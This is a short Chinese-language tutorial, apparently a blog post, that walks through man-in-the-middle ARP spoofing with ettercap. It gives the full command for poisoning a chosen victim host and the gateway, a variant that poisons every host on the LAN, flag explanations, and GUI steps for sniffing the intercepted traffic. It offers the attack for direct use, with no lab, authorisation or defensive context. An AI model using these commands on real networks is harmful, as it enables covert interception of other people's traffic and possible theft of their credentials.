1、查看网络接口状态选择自己将要欺骗的网段的一个接口。(这里我选择wlan0)
2、输入命令ettercap -Tqi wlan0 -M arp:remote /欺骗主机的ip// /网关ip//
参数解释:
-T 文本模式
-q 安静模式 抓到数据包后不显示
-i 选择网络接口 (我选的wlan0)
-M 选择模式
注:(如果想欺骗局域网的所有主机可写成:ettercap -Tqi wlan0 -M arp:remote /// /网关ip//)
3、当你嗅探到想要的数据后按下q退出ettercap。
4、如果不习惯用命令行界面就是用gui图形界面
使用root权限
命令为: ettercap -G
5、图形界面先选择网卡,后选择arp模块。
6、单击start开始嗅探。
